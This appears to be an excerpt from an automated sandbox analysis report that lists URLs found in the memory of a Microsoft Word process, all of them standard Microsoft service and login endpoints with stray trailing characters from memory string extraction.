Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292128544.0000000010877000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://devnull.onenote.com
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://devnull.onenote.comedOw
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://directory.services.
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://ecs.office.com/config/v2/Office
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://ecs.office.com/config/v2/Office75
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://enrichment.osi.office.net/
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net//8E
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/F7
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v11Q
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v16
Source: WINWORD.EXE, 00000001.00000002.569040396.000000000CF4F000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
Source: WINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/W
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
Source: WINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.jsonv
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: WINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtmlG
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeJ
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeK
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeN~
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeO
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizePGr
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeQHs
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeT
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeU
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeWFq
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeXa
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeY
Source: WINWORD.EXE, 00000001.00000003.417572350.000000001087D000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571214526.000000001087D000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292128544.0000000010877000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292417505.000000001087F000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeZ
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizea
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeaE
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizec
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizecG
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizecom7HQ
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizee
Source: WINWORD.EXE, 00000001.00000003.417572350.000000001087D000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571214526.000000001087D000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292128544.0000000010877000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292417505.000000001087F000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizefic
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeg
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizei
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeize
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizej
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeka
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizel
Source: WINWORD.EXE, 00000001.00000003.417572350.000000001087D000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571214526.000000001087D000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292128544.0000000010877000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292417505.000000001087F000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizellJ
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizemH
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizep
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizepE
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeqF
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizerGl
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizesHm
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizete
